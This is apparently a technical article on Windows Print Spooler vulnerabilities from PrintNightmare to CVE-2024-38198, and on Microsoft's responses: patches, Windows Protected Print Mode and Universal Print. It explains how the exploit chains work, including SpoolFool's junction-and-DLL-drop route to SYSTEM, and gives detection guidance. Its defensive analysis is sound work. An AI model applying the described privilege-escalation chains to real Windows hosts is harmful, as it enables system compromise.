CISA's response was Emergency Directive 21-04, issued July 13, 2021. The directive mandated that federal civilian agencies disable the Print Spooler service on all Microsoft Active Directory domain controllers by 11:59 PM EDT on Wednesday, July 14, 2021 [@cisa-ed-21-04]. The framing in CISA's own words was direct: "exploitation of the vulnerability allows an attacker to remotely execute code with system level privileges enabling a threat actor to quickly compromise the entire identity infrastructure of a targeted organization" [@cisa-ed-21-04].

ED 21-04 is narrower than the press summaries suggest. It applies only to Active Directory domain controllers. It does not require disabling Spooler on every Windows endpoint in a federal agency, only on the hosts where the bug's domain-takeover impact is largest. CISA closed ED 21-04 in January 2026 and folded its required actions into BOD 22-01 (the Known Exploited Vulnerabilities catalogue), but the operational guidance survived intact: disable Spooler on DCs, patch elsewhere. The DC-disabled baseline is still the federal civilian default for agencies that have not migrated to Universal Print [@cisa-ed-21-04]. We come back to this in section 10.4.

The June 8 patch covered one RPC entry point. The July 6 patch covered the other. Neither patch changed the architectural primitive. Within five weeks, a third primitive (not an RPC entry point but a registry default) was already failing.

4.3 Generation 3: CVE-2021-34481, KB5005010, KB5005652, and the September Policy Rewrite

On August 10, 2021, Microsoft shipped the cumulative update that flipped the RestrictDriverInstallationToAdministrators default from 0 to 1. On September 14, 2021, it shipped the knowledge-base article that documented why the previous defaults could not be saved.

CVE-2021-34481 had already been published as a Print Spooler local EoP on July 15, 2021, classified by NVD as CWE-269 Improper Privilege Management [@nvd-cve-2021-34481]. The August 10 KB5005010 / KB5005033 cumulative updates closed it and flipped the default value for the HKLM\Software\Policies\Microsoft\Windows NT\Printers\PointAndPrint\RestrictDriverInstallationToAdministrators registry value from 0 to 1 [@kb-5005010-topic]. NVD's entry for CVE-2021-34481 carries the cross-reference verbatim: "UPDATE August 10, 2021: Microsoft has completed the investigation and has released security updates to address this vulnerability... This security update changes the Point and Print default behavior; please see KB5005652" [@nvd-cve-2021-34481].

The five-week opt-in window between July 6 and August 10, 2021, is the most interesting failure in the entire patch cascade. Hosts that received KB5004945 but had no Group Policy push for the new value were still exploitable through Point and Print elevation suppression even with the emergency patch applied. The lesson is structural. Opt-in safe defaults do not protect a real installed base.

On September 14, 2021, KB5005652 shipped. The article's title spells out its scope: "Manage new Point and Print default driver installation behavior (CVE-2021-34481)" [@kb-5005652-topic]. The article's most-quoted sentence is the most consequential one Microsoft has shipped about Print Spooler:

Note: KB5005652 says, in a customer-facing knowledge-base article, that there is no settings-tweak combination that gives you the same protection as flipping the new admin-only switch. That is Microsoft, in its own voice, naming the configuration surface as insufficient.

There is no combination of mitigations that is equivalent to setting `RestrictDriverInstallationToAdministrators` to 1. -- Microsoft, KB5005652, September 14, 2021 [@kb-5005652-topic] [@kb-5005652-help]

Read that sentence twice. Microsoft, in its own knowledge-base voice, said that no combination of the previously available configuration knobs added up to the protection the new admin-only restriction provided. The implication is that for the entire period from Windows NT 4 through August 10, 2021 (roughly twenty-three years), the configuration surface for Point and Print did not contain a setting that made the bug class go away. Tightening individual knobs got you somewhere short of the architectural answer. That is the verbatim concession the September article makes.

The same Patch Tuesday (September 14, 2021), Microsoft also patched CVE-2021-36958, another Print Spooler RCE in the same family [@nvd-cve-2021-36958].The reporter attribution for CVE-2021-36958 remains disputed in the public record. Public consensus credits Victor Mata (Accenture Security FusionX) for the formal MSRC acknowledgment. Benjamin Delpy demonstrated public bypasses of the existing PrintNightmare mitigations through August 2021 that are most often cited as the immediate motivation for the September fix. We have not located a Microsoft-primary source that resolves the question, and we cite both names rather than collapse them.

Three patch waves into PrintNightmare, Microsoft had written down, in a customer-facing knowledge-base article, that no configuration-surface response was equivalent to the architectural fix. The architectural fix did not yet exist. SpoolFool was four months away.

4.4 Generation 4: CVE-2022-21999 (SpoolFool, February 8, 2022)

On February 8, 2022, Oliver Lyak (handle @ly4k_, trailing underscore) of SafeBreach Labs published SpoolFool. The exploit is a Print Spooler local privilege escalation that abuses the SpoolDirectory registry value plus an NTFS junction [@ly4k-spoolfool]. The primitive was the same one Shafir and Ionescu had described eighteen months earlier in CVE-2020-1337. The patch surface had moved. The architectural primitive had not.

The mechanism, walked through carefully: each per-printer registry key under HKLM\System\CurrentControlSet\Control\Print\Printers\<printer-name> has a SpoolDirectory value. The SYSTEM-context spooler reads that value, calls CreateDirectory on the path, and then writes spool files into the resulting directory. The SpoolDirectory value is writable by an authenticated user. The exploit therefore composes three steps: (1) set SpoolDirectory to an attacker-chosen path, (2) plant an NTFS junction or symbolic link at that path pointing into a SYSTEM-writable directory, (3) trigger a printer reload to cause the SYSTEM-context spooler to create the destination directory and drop attacker-controlled files there [@ly4k-spoolfool]. NVD classifies the bug as CWE-59 Link Following [@nvd-cve-2022-21999].

Anti-regression note for readers familiar with the early coverage: SpoolFool is a Print Spooler arbitrary-file-write LPE. It is not a Win32k integrity-level bypass. Win32k is the GUI subsystem and is uninvolved in this bug class. The researcher handle is @ly4k_ (Oliver Lyak), not @jonas_lyk (a distinct security researcher).

From arbitrary file write to SYSTEM code execution is the next step. Lyak's repository demonstrates a DLL-drop into a path that a SYSTEM-context process will load on next start, then a service restart, then SYSTEM-context execution of the attacker's DLL [@ly4k-spoolfool]. The end-to-end primitive is the same shape as the post-PrintDemon exploit chain from August 2020.

The architectural moral: patching RpcAddPrinterDriverEx, patching RpcAsyncAddPrinterDriver, and flipping the Point and Print elevation default did not change the fact that the spooler runs as SYSTEM and operates on user-controlled filesystem paths. SpoolFool is the bug-fixing-bug exhibit for the section 5 architectural-concession argument. Four patches into the cycle, the same TOCTOU primitive that the August 2020 PrintDemon bypass had used was still exploitable eighteen months later, against a different callsite, against the same SYSTEM-context spooler.

4.5 Generation 5: CVE-2024-38198 (August 13, 2024 Patch Tuesday)

On August 13, 2024 Patch Tuesday, Microsoft patched a Windows Print Spooler Elevation of Privilege Vulnerability. The CVSS v3.1 base score was 7.5, with vector AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H [@wiz-cve-2024-38198] [@rapid7-cve-2024-38198]. The CWE class was 345, Insufficient Verification of Data Authenticity [@wiz-cve-2024-38198]. The exploit primitive required winning a race condition. No public researcher attribution exists for it. There is, as of mid-2026, no public PoC.

The framing here has to be precise. CWE-345 is "Insufficient Verification of Data Authenticity"; CWE-362 is "Race Condition." These are two different classes. The exploit happens to require winning a race condition to be exploitable; that is a statement about how hard it is to exploit, not a statement about the underlying bug class. Microsoft (per Wiz, citing the MSRC advisory) classified the underlying defect as CWE-345.The CWE-345 attribution for CVE-2024-38198 is INFERRED via Wiz's vulnerability database, which states verbatim that "the vulnerability has been classified under CWE-345 (Insufficient Verification of Data Authenticity) by Microsoft Corporation" [@wiz-cve-2024-38198]. The MSRC update-guide page is a JavaScript single-page application, so verification of the CWE attribution by automated tools like web_fetch runs through Wiz's vulnerability database as the one-step intermediary; a reader with a browser can confirm the same classification directly on the MSRC page. Rapid7's vulnerability database carries the per-SKU KB list and confirms the August 13, 2024 publication date [@rapid7-cve-2024-38198].

Why this CVE matters for the section 5 argument: it is the empirical proof point that the spooler was still producing novel-class EoP primitives three years after PrintNightmare, eight months after Microsoft announced WPP in the December 2023 MORSE blog [@ms-blog-secure-print-experience-4002645], and seven weeks before WPP shipped opt-in.

Four patch waves across three years. Five named CVEs in the patch tree, plus four more in the pre-history. Nine independently classed Print Spooler SYSTEM-code-execution primitives in fifteen years. The next section is about why Microsoft did not, and could not, ship a tenth patch that closed the class.

4.6 The Four-Generation Patch Tree, in One Diagram

The patch tree, mapped to the entry point each generation closed and the bypass each generation enabled:

flowchart TD G1["G1: June 8, 2021
RpcAddPrinterDriverEx
auth check added"] G2["G2: July 6, 2021
KB5004945 emergency
RpcAsyncAddPrinterDriver patched"] G3["G3: August 10, 2021
KB5005010 / KB5005033
RestrictDriverInstallationToAdmins default 0 to 1"] G3b["G3b: September 14, 2021
KB5005652
no settings combination is equivalent"] G4["G4: February 8, 2022
CVE-2022-21999 SpoolFool
SpoolDirectory + NTFS junction CWE-59"] G5["G5: August 13, 2024
CVE-2024-38198
CWE-345 race-condition-exploitable"] G1 --> G2 G2 --> G3 G3 --> G3b G3b --> G4 G4 --> G5 G5 --> EXIT["Architectural exit:
WPP / Universal Print
(section 5)"]

And the four-fix-strategy comparison matrix in scannable form:

Generation	CVE	Patch artifact	Attack surface closed	Attack surface left open	Time to documented bypass
G1	CVE-2021-1675	June 8 monthly patch	`RpcAddPrinterDriverEx` (MS-RPRN) low-priv path	`RpcAsyncAddPrinterDriver` (MS-PAR) low-priv path	~3 weeks
G2	CVE-2021-34527	KB5004945 (July 6-7 OOB)	Both RPC entry points	Point-and-Print elevation suppression (`NoWarningNoElevationOnInstall=1`)	~5 weeks (config-not-yet-flipped)
G3	CVE-2021-34481	KB5005010 / KB5005033 / KB5005652	Admin-only default for new printer driver install	Spool directory filesystem operations	~21 weeks (SpoolFool)
G4	CVE-2022-21999	February 2022 patch	`SpoolDirectory` reparse-point race	Other spooler filesystem operations and authenticity checks	~30 months (CVE-2024-38198)
G5	CVE-2024-38198	August 13, 2024 patch	CWE-345 authenticity gap (race-condition exploitable)	Architectural primitive itself	(no public bypass as of June 2026)

Five subsections. Five entry points. One architectural primitive. The patches do not converge because they cannot.

5. The Architectural Concession: Why Microsoft Cannot Sandbox `spoolsv.exe`

An obvious question reading section 4 is: why does Microsoft not just sandbox spoolsv.exe? AppContainer exists. Win32 has had constrained-token processes since Windows 8. The Microsoft Office suite runs in low-trust containers. Why is the Print Spooler the exception?

5.1 The Naive Sandbox Proposal

The naive proposal is to run spoolsv.exe in an AppContainer with no SYSTEM token. The proposal fails for two reasons. The first is engineering. The spooler must register with the Service Control Manager, must coordinate with kernel-mode print components, and must accept inbound RPC over a system named pipe -- operations a fully constrained token does not permit. That problem is solvable; it costs engineering effort, but it has obvious answers (broker process, careful capability grants, custom token).

A Windows process sandboxing primitive introduced for the Universal Windows Platform that runs a process with a custom integrity level, a restricted token, and a set of explicitly granted capabilities. AppContainer-restricted processes cannot make network connections, read user files, or invoke APIs outside their capability set without explicit permission. Microsoft Edge content processes and many Windows Store apps run in AppContainers; legacy Win32 services typically do not.

The second reason is the back-compat constraint from section 2.3. The third-party driver DLLs in the installed base are signed and packaged to expect LocalSystem context. They use Win32 APIs that a constrained token cannot call. They write to filesystem locations a constrained token cannot reach. They register printer ports through interfaces that a fully sandboxed spooler could not host. The cost of the constrained-token migration is not the cost of changing one Microsoft binary. It is the cost of breaking, in the worst case, every Windows-compatible printer manufactured before 2024.Microsoft has never published a statement that AppContainer was explicitly evaluated and rejected for spoolsv.exe. The argument above is INFERRED from the absence of any constrained-token Spooler in any shipped Windows release, and from the MORSE blog's repeated framing of the third-party driver install base as the binding constraint [@ms-wpp-more-info]. The inference is well grounded but not directly stated.

5.2 PrintIsolationHost.exe as Partial Answer

Microsoft's first attempt to break the "DLL loaded inside spoolsv.exe" conjunct shipped with Windows 7 and Windows Server 2008 R2 (October 22, 2009) [@ms-print-spooler-architecture] [@ms-previous-versions-server-2008-R2]. It was called Printer Driver Isolation. The mechanism: third-party driver code can run in a sibling process called PrintIsolationHost.exe. The spooler talks to that process over IPC instead of loading the driver DLL into its own address space.

A sibling host process introduced in Windows 7 / Server 2008 R2 (October 22, 2009) that can load third-party printer driver code outside of `spoolsv.exe`. Drivers opt in via the `DriverIsolation` directive in their INF file: Microsoft's documentation enumerates two values, `2` ("the driver supports driver isolation") and `0` ("the driver does not support driver isolation"; the same effect as omitting the keyword) [@ms-printer-driver-isolation]. By default, `PrintIsolationHost.exe` runs as LocalSystem [@ms-printer-driver-isolation] [@ms-print-spooler-architecture]. The isolation is process isolation, not privilege isolation.

Three details matter for the section 5 argument. First, the isolation is process isolation, not privilege isolation: PrintIsolationHost.exe itself runs as LocalSystem. A bug in PrintIsolationHost.exe is still a SYSTEM bug, just in a different process. Second, the opt-in is the driver vendor's responsibility, set in the INF file's DriverIsolation directive [@ms-printer-driver-isolation]. By default, if the INF does not opt in, the spooler loads the driver in-process. Third, and most importantly: PrintIsolationHost.exe only hosts driver code at print time. It does not move the RPC server, the driver-installation flow (RpcAddPrinterDriverEx and RpcAsyncAddPrinterDriver), or the spool directory filesystem operations out of spoolsv.exe. The PrintNightmare entry points are all in code paths Printer Driver Isolation does not touch.

So Printer Driver Isolation existed for twelve years before PrintNightmare. It did not help. It addresses a different attack surface.

5.3 The MORSE Framing

In December 2023, the Microsoft Offensive Research and Security Engineering (MORSE) team and the Print team co-authored a Microsoft Security Blog post announcing what would become Windows Protected Print Mode. The blog and its companion Microsoft Learn pages contain two sentences that are load-bearing for the rest of this article.

The first sentence sets the cadence empirically:

Print bugs accounted for 9% of all cases reported to the Microsoft Security Response Center (MSRC) over the past three years. -- Microsoft, December 2023 [@ms-wpp-more-info] [@ms-blog-secure-print-experience-4002645]

The "over the past three years" qualifier matters. The 9% is a baseline measurement for 2020 through 2023, not a long-term steady-state rate. Without the qualifier, the number reads as a stable structural fact about Windows. With the qualifier, it reads as what it actually is: a measurement of the period during which the patch cascade documented in section 4 was running.

The second sentence is more consequential. Microsoft, in its own voice, names the architectural answer:

The ideal solution would be to remove drivers entirely and move the Spooler to a least privilege security model. -- Microsoft, MORSE / Print team [@ms-wpp-more-info]

Read that sentence in the context of the section 4 patch cascade. Microsoft is saying that the architectural answer to the bug class is not a better authorization check, not a tighter Point and Print policy, not a more aggressive default flip. It is to remove third-party drivers entirely and to move the spooler off LocalSystem. The enterprise version of the same document spells out the coverage expectation:

Windows protected print mode would mitigate over half of past reported security issues for Windows print. -- Microsoft, Windows Protected Print Mode for Enterprises [@ms-wpp-enterprises]

"Past reported security issues for Windows print" is a class. "Would mitigate over half" is a coverage statement at the class level, not at the bug level. WPP is a class mitigation; it is the architectural answer the patch cascade could not produce.

5.4 The Forced Parallel-Stack Answer

Here is where the argument turns. Microsoft did not ship one architectural answer. It shipped two. The reason is that neither one alone covers the back-compat envelope.

Universal Print is the cloud-hosted answer. It removes the local print queue, removes the local SYSTEM-context Spooler from the workflow entirely, and centralizes the print fan-out in Microsoft 365 [@ms-universal-print-whatis]. On a Universal-Print-only endpoint with the local Spooler service disabled, there is no \PIPE\spoolss exposed to a low-privilege user. The architectural primitive's conjunct (a) -- the low-privilege RPC entry -- simply does not exist on that host.

Windows Protected Print Mode is the local-stack answer. It keeps the local Spooler service but restructures it: most operations are deferred to a Spooler Worker process with a restricted token, and the spooler refuses to load any driver DLL that is not Microsoft-signed [@ms-wpp-more-info] [@ms-wpp-canonical]. The architectural primitive's conjuncts (b) (caller-influenced DLL load) and partially (c) (SYSTEM context, for per-user operations) are broken.

Neither answer covers the union of constraints that a real Windows fleet faces. Universal Print requires cloud connectivity, Microsoft 365 / Entra ID licensing, and per-printer service costs. It does not work offline. It does not work for specialty printers (industrial label printers, healthcare imaging printers, secure check printers) that have no IPP-class-compatible firmware. WPP requires Mopria-certified printers or the small set of Microsoft-signed drivers that ship inbox. It does not work for the same specialty-printer category. The two answers cover different threat models, different licensing models, and different operational realities.

Key idea: Windows Protected Print Mode and Universal Print are not redundant. They break different conjuncts of the architectural primitive, and together they cover what neither covers alone. The 2024 Windows print stack is a deliberate parallel architecture, not a transition state.

The WPP FAQ confirms the parallel-stack reading. When asked "Will Windows protected print mode ever be enabled by default?" the page answers verbatim: "Windows protected print mode will be enabled by default at a future date" [@ms-wpp-faq].The "future date" phrasing in the WPP FAQ is preserved verbatim because it carries the entire commitment. Microsoft has published deprecation milestones for third-party drivers (January 15, 2026; July 1, 2026; July 1, 2027) [@ms-end-of-servicing], but it has not committed to a date for WPP-on-by-default. As of June 2026, "at a future date" is still the only formal commitment.

5.5 The Conjunct Framing as Lead-in to Section 8

We can state the architectural argument compactly now and we will return to it formally in section 8. The architectural primitive has three conjuncts. (a) The service accepts low-privilege RPC. (b) It loads caller-influenced third-party DLLs. (c) It runs at SYSTEM. Any service of that shape produces a SYSTEM-execution primitive by construction. Microsoft's three shipped approaches each break exactly one conjunct:

flowchart LR PRIM["Architectural primitive
(a) low-priv RPC entry
(b) caller-influenced DLL load
(c) SYSTEM context"] EXITA["Break (a) low-priv RPC entry"] EXITB["Break (b) caller-influenced DLL load"] EXITC["Break (c) SYSTEM context"] PRIM --> EXITA PRIM --> EXITB PRIM --> EXITC EXITA --> UP["Universal Print (2021)
no local pipe spoolss"] EXITA --> CERT["Stop Spooler service
(CERT/CC 2021)"] EXITB --> WPPMOD["WPP module blocking (2024)
only Microsoft-signed drivers"] EXITC --> PIH["PrintIsolationHost (2009)
partial: still LocalSystem"] EXITC --> WPPWORKER["WPP Spooler Worker (2024)
restricted token, below SYSTEM IL"]

The remaining sections are about the design space Microsoft chose to occupy in 2024, why it occupies two points rather than one, and what is still missing in 2026 -- including, candidly, a satisfying answer for environments that cannot adopt either architectural exit.

6. State of the Art: Windows Protected Print Mode in 24H2

Windows Protected Print Mode shipped to Windows 11 24H2 on October 1, 2024 as an opt-in feature [@computerweekly-quocirca-wpp] [@ms-wpp-canonical]. As of June 2026 it is still opt-in. The WPP FAQ uses the verbatim phrase "at a future date" for when the default-on flip will happen [@ms-wpp-faq]. No date has been committed.

An opt-in Windows print stack introduced with Windows 11 24H2 (October 1, 2024) that exclusively uses the modern print stack, blocks all third-party printer drivers, runs normal spooler operations in a Spooler Worker process with a restricted token below SYSTEM integrity, and falls back to the inbox Microsoft IPP Class Driver for printer communication [@ms-wpp-canonical] [@ms-wpp-more-info]. Activation is by Group Policy ("Configure Windows protected print"), Intune (`./Device/Vendor/MSFT/Policy/Config/Printers/ConfigureWindowsProtectedPrint` via the Policy CSP for Printers [@ms-policy-csp-printers]), or registry [@ms-wpp-enterprises].

6.1 What WPP Changes

Microsoft's MORSE / Print team blog enumerates six concurrent changes [@ms-wpp-more-info]. Each one is interesting on its own; together they constitute the architectural exit.

Spooler Worker process with restricted token. Normal spoolsv.exe operations are deferred to a new Spooler Worker process. The worker runs with a restricted token that drops SeTcbPrivilege and SeAssignPrimaryTokenPrivilege and runs below SYSTEM integrity level. This is the operational form of "move the Spooler to a least privilege security model" from the MORSE quote.

The new Spooler Worker process has a new restricted token that removes many privileges such as SeTcbPrivilege, SeAssignPrimaryTokenPrivilege, and no longer runs at SYSTEM IL. -- Microsoft Learn, More information on Windows Protected Print Mode [@ms-wpp-more-info]

That sentence, taken verbatim from Microsoft's own architecture documentation [@ms-wpp-more-info] [@ms-wpp-more-info-wayback], is the most concrete claim Microsoft has shipped about how WPP breaks conjunct (c). Two privileges enumerated, one integrity level reduced. The legacy spoolsv.exe process is still SYSTEM; the worker that does the per-job work is not.

Module blocking. APIs that previously allowed third-party module loading (AddPrintProviderW and similar) are gated by a module-blocking policy. The MORSE document states the new policy verbatim: "only Microsoft Signed binaries required for IPP are loaded" [@ms-wpp-more-info].

XPS rendering per-user. XPS rendering, historically a source of memory-corruption bugs in PrintFilterPipelineSvc, runs per-user instead of as SYSTEM. A memory-corruption bug in the XPS parser now compromises a user, not the machine.

Process hardening on the Spooler Worker. The Spooler Worker process is built with Control Flow Guard, Control Flow Enforcement Technology (Intel CET shadow stack), Arbitrary Code Guard, Child Process Creation Disabled, and Redirection Guard enabled [@ms-wpp-more-info] [@msrc-redirectionguard-blog]. The MORSE blog explicitly says why the legacy spooler could not enable these mitigations: "many print drivers are decades old and are incompatible with modern security mitigations" [@ms-wpp-more-info].

Point and Print restricted. Point and Print can configure an IPP printer but cannot install a third-party driver. The MORSE document is verbatim: "Windows protected print mode prevents Point and Print from ever installing third-party drivers" [@ms-wpp-more-info]. That sentence is the architectural answer to the Generation 3 patch wave from section 4.3.

Fallback to inbox IPP class driver. Printing falls back to the Microsoft IPP Class Driver that ships with Windows. The driver works with Mopria-certified printers and with the Microsoft-signed driver subset [@mopria-certified-products] [@ms-modern-print-platform].

6.2 Mapping WPP to the Three Conjuncts

WPP breaks conjunct (b) by refusing to load anything that is not Microsoft-signed. It weakens conjunct (c) by moving the bulk of operations into a Spooler Worker with a restricted token below SYSTEM integrity. The low-privilege RPC entry (conjunct a) is preserved by design: the RPC interface still exists, clients still talk to it, but what they can ask the service to do is reduced.

That last asymmetry matters. WPP does not delete the \PIPE\spoolss endpoint. A WPP-enabled host still answers RpcAddPrinterDriverEx calls; it just refuses to load an unsigned driver in response. Detection rules that watched for the RPC call itself (the SigmaHQ Zeek-on-the-wire rule, for instance [@sigma-cve-2021-1675-zeek]) still see traffic on WPP hosts; rules that watched for the resulting unsigned DLL load (the SigmaHQ image-load rule [@sigma-cve-2021-1675-win-spooler]) should see audit events instead.

6.3 The Compatibility Envelope

WPP requires either a printer that the inbox IPP class driver can drive (a Mopria-certified printer in practice) or one of the small set of Microsoft-signed drivers. The Mopria Alliance certified-products directory lists a multi-vendor catalog of printers across Brother, Canon, HP, Epson, Lexmark, Xerox, and others [@mopria-certified-products]. The installed base of Mopria-certified printers is large.The Mopria Alliance does not publish a single official total install-base count. The certified-products directory is the canonical inventory [@mopria-certified-products], and the industry-analyst framing in the December 2023 MORSE blog points to a multi-vendor catalog "covering many of the most common printer brands sold worldwide" [@ms-blog-secure-print-experience-4002645]. We report the order of magnitude (industry-wide) rather than a brittle exact count.

Printers that require vendor-specific v3 drivers are not WPP-compatible by default. Industrial label printers (Zebra, Honeywell, SATO, TSC, Dymo) are the painful case. Their command languages (ZPL, EPL) are not part of the IPP class driver's repertoire [@ezeep-label-printers-wpp]. ezeep's June 2026 writeup is blunt: "Most thermal label printers... are not Mopria-certified, so they stop working when Windows Protected Print Mode is enforced. ZPL and EPL are not part of the IPP spec the IPP class driver speaks" [@ezeep-label-printers-wpp]. Three paths are open: keep WPP disabled on label workstations via GPO, refresh hardware to IPP-capable models, or use a cloud-rendered alternative.

Vendors that want WPP compatibility without a full IPP firmware conversion can ship Print Support Apps. Brother is one of the first vendors to publish a PSA [@brother-print-support-app]. Lexmark's vendor primary on the WPP transition documents the same path [@lexmark-wpp-support].

The Microsoft-supplied inbox driver that uses the Internet Printing Protocol (IPP) to communicate with printers that implement the Mopria-Alliance-certified IPP everywhere subset. WPP-enforced clients use this driver instead of a vendor-specific driver. Printers must be Mopria-certified (or implement Mopria-compatible IPP) for the inbox driver to drive them [@mopria-certified-products] [@ms-modern-print-platform]. The two pre-WPP Windows printer driver packaging models. v3 (Windows 2000 era) loads driver render code into the spooler process by default. v4 (Windows 8 era) is XPS-based, packaged for portability across architectures, and has a more limited print processor model. WPP deprecates both in favor of the inbox IPP class driver (or, transitionally, vendor Print Support Apps) [@ms-print-spooler-architecture] [@ms-end-of-servicing].

6.4 Deployment Surfaces and Detection Signals

WPP's enable / disable control is a binary two-state CSP. The Policy CSP page documents Printers/ConfigureWindowsProtectedPrint as accepting 0 (disabled, the 2026 default) or 1 (enabled), with no audit / monitor intermediate enum [@ms-policy-csp-printers]. The corresponding Group Policy path is "Computer Configuration > Administrative Templates > Printers > Configure Windows protected print" [@ms-wpp-enterprises]. CIS Benchmarks v5.0.1 (Windows 11) and v1.0.0 (Server 2025) treat the setting as a Level-2 hardening recommendation with the same binary registry value [@tenable-cis-w11-l2] [@tenable-cis-server-2025-l2].

This is an important correction to a piece of folk wisdom about WPP. The Windows kernel and AppLocker have audit / enforce modes; AppControl for Business has audit / enforce modes; AMSI has logging tiers. WPP does not. Microsoft did not ship an "audit" enum on ConfigureWindowsProtectedPrint. Administrators who want pre-enforcement telemetry have to instrument it themselves, either by reading the existing Microsoft-Windows-PrintService/Admin event log (which carries Point and Print failures and module-load refusals regardless of whether WPP is on) or by deploying WPP to a pilot ring and watching the same log on those pilot machines. The deployment pattern is rollout rings, not an in-product audit mode.

Because there is no in-product audit mode, the pre-enforcement signal is the existing print-services event log. The Microsoft-Windows-PrintService/Admin channel records driver-load failures, Point and Print restrictions, and plug-in load failures. Splunk Research's spoolsv.exe rule pack covers PrintService Admin Event ID 808 (plug-in load failure) paired with security log Event ID 4909 [@splunk-research-spoolsv-plugin-fail], and Event ID 316 for driver-add operations [@splunk-printnightmare-story] [@splunk-research-printnightmare-driver]. Redirection Guard mitigation events land in Microsoft-Windows-Security-Mitigations/Operational [@msrc-redirectionguard-blog]. The diagnostic Event ID 4098 (in the Application log) is the workhorse signal for Point and Print restrictions and predates WPP [@ms-event-ids-point-print].

Note: The ConfigureWindowsProtectedPrint CSP has two states: 0 (disabled) and 1 (enabled). There is no in-product audit / monitor mode. The right deployment pattern is rings: pilot, broad-pilot, production. Pilot a small ring of representative endpoints with WPP enforced and watch Microsoft-Windows-PrintService/Admin events 316, 808, and 4098 for failed driver loads and Point and Print restrictions. Identify the printers that would fail. Decide between a fleet hardware refresh, a transitional Print Support App, or an exclusion list. Then expand the ring.

The probe below models a WPP-state PowerShell script in JavaScript for the runtime. It pretends the four signals (WPP policy state, Redirection Guard, recent PrintService Admin events, IPP class driver availability) are already retrieved; in production the values come from the Group Policy resultant set, Get-ProcessMitigation, Get-WinEvent, and Get-PrinterDriver.

{` // Original PowerShell equivalents: // $wppPolicy = (Get-ItemProperty 'HKLM:\SOFTWARE\Policies\Microsoft\Windows NT\Printers') // .ConfigureWindowsProtectedPrint # 0 = disabled, 1 = enabled // $rg = (Get-ProcessMitigation -Name spoolsv.exe).RedirectionTrust // $events = Get-WinEvent -LogName 'Microsoft-Windows-PrintService/Admin'
// -MaxEvents 200 | Where-Object { $.Id -in 316,808,4098 -and
// $.TimeCreated -ge (Get-Date).AddDays(-7) } // $ipp = (Get-PrinterDriver -Name 'Microsoft IPP Class Driver') -ne $null

const state = { wppPolicy: 0, // 0 = disabled, 1 = enabled (binary CSP) redirectionGuard: 'Enabled', // 'Disabled' | 'Audit' | 'Enabled' recentPrintServiceFailures: 14, // count of EventID 316/808/4098 in last 7d inboxIppDriverPresent: true, deploymentRing: 'pilot' // 'pilot' | 'broad-pilot' | 'production' };

console.log(classify(state)); `}

6.5 Redirection Guard

Redirection Guard is an independent process mitigation that ships separately from WPP but composes with it. It first arrived in Windows 11 22H2 in late 2023 and was the subject of a June 2025 MSRC blog post that documents its design [@msrc-redirectionguard-blog]. The mitigation is documented in the PROCESS_MITIGATION_REDIRECTION_TRUST_POLICY Win32 API structure [@ms-redirection-trust-policy] and is invoked through Set-ProcessMitigation -Name spoolsv.exe -Enable RedirectionGuard [@ms-set-processmitigation].

The mechanism: a process opted into Redirection Guard refuses to follow filesystem junctions or symbolic links created by non-administrator users. The MSRC blog frames the scope plainly: "Junctions remain the biggest existing gap. Outside of a sandbox, they can be created by standard users and target any folder on the system" [@msrc-redirectionguard-blog]. The Risky Business bulletin on the launch documents the empirical impact: of forty-two filesystem-path-redirection CVEs Microsoft patched in 2024, thirty-two used attacker-created junctions and could have been blocked by Redirection Guard had it been in place [@risky-biz-redirectionguard].

Redirection Guard is the closest thing to a post-SpoolFool architectural fix in the legacy stack. WPP composes with it; a WPP-enabled host has both Redirection Guard on the legacy spoolsv.exe process and the additional CFG / CET / ACG / Child Process Creation Disabled / Redirection Guard set on the Spooler Worker [@ms-wpp-more-info].

6.6 A Failed PrintNightmare Attempt Against a WPP-Enabled Host

The sequence below shows what happens when a low-privilege user attempts the Generation 1 PrintNightmare exploit against a WPP-enabled host. The RPC entry point is still answered; the module load is refused; the audit log captures the attempt; the elevation does not happen.

sequenceDiagram participant U as Low-priv user participant P as PIPE spoolss endpoint participant S as spoolsv.exe (parent) participant W as Spooler Worker (restricted token) participant L as Module loader participant V as Signature check participant E as PrintService Admin log U->>P: RpcAddPrinterDriverEx (unsigned DLL) P->>S: dispatch RPC call S->>W: forward driver-install to worker W->>L: load requested driver DLL L->>V: verify signature V-->>L: reject (not Microsoft-signed) L-->>W: load refused W->>E: write audit event 4098 (Point and Print failure) W-->>S: return access-denied S-->>U: STATUS_ACCESS_DENIED Note over U,W: No code runs as SYSTEM. Defender sees attempt in PrintService Admin.

WPP is a partial answer that covers a large fraction of the threat model and a smaller fraction of the printer install base. The size of that smaller fraction -- specialty printers without IPP-class compatibility -- is the largest open practical problem in 2026 Print Spooler security.

7. Competing Answers: Universal Print versus Windows Protected Print Mode

Microsoft did not ship one architectural answer to Print Spooler. It shipped two. They are not redundant. They cover different threat models and different operational realities, and they are designed to coexist.

7.1 Universal Print at One Glance

Universal Print became generally available on March 2, 2021 [@ms-365-blog-universal-print-2212333] [@ms-universal-print-fundamentals].The exact March 2, 2021 GA date is industry knowledge anchored to Microsoft Ignite Spring 2021. The contemporaneous Microsoft 365 blog post [@ms-365-blog-universal-print-2212333] covers the wave but does not contain the verbatim date string. The Microsoft Learn fundamentals page documents the program's original ms.date of March 2, 2020 (one year before GA) [@ms-universal-print-fundamentals]. We cite both because each one supports a different facet of the same date. The service moves the print queue to Microsoft 365 / Entra ID, removes the on-premises print server entirely, and removes the need for client-side third-party drivers. An optional on-prem connector lets the cloud service drive printers that are not directly cloud-aware [@ms-universal-print-whatis].

Microsoft's cloud-hosted print service. Universal Print eliminates print servers like OneDrive eliminates file servers [@ms-universal-print-whatis]. The architectural exit it takes is breaking conjunct (a): a Universal-Print-only endpoint with the local Spooler service disabled has no `\PIPE\spoolss` exposed to a low-privilege user. Universal Print became generally available on March 2, 2021 [@ms-365-blog-universal-print-2212333] and reached GCC / GCC High in October 2023 [@ms-universal-print-government].

The architectural exit it takes is the one section 5 labelled (a): there is no \PIPE\spoolss endpoint exposed on a Universal-Print-only host. The endpoint is a Microsoft 365 service called MPSIPPService that runs at https://print.print.microsoft.com/ [@ms-universal-print-getting-started]. Authentication is Entra ID OAuth2 / OIDC [@ms-universal-print-getting-started]. The threat model it removes is the local SMB-reachable low-privilege caller; the threat model it introduces is the cloud-account compromise.

7.2 The Cost of Universal Print

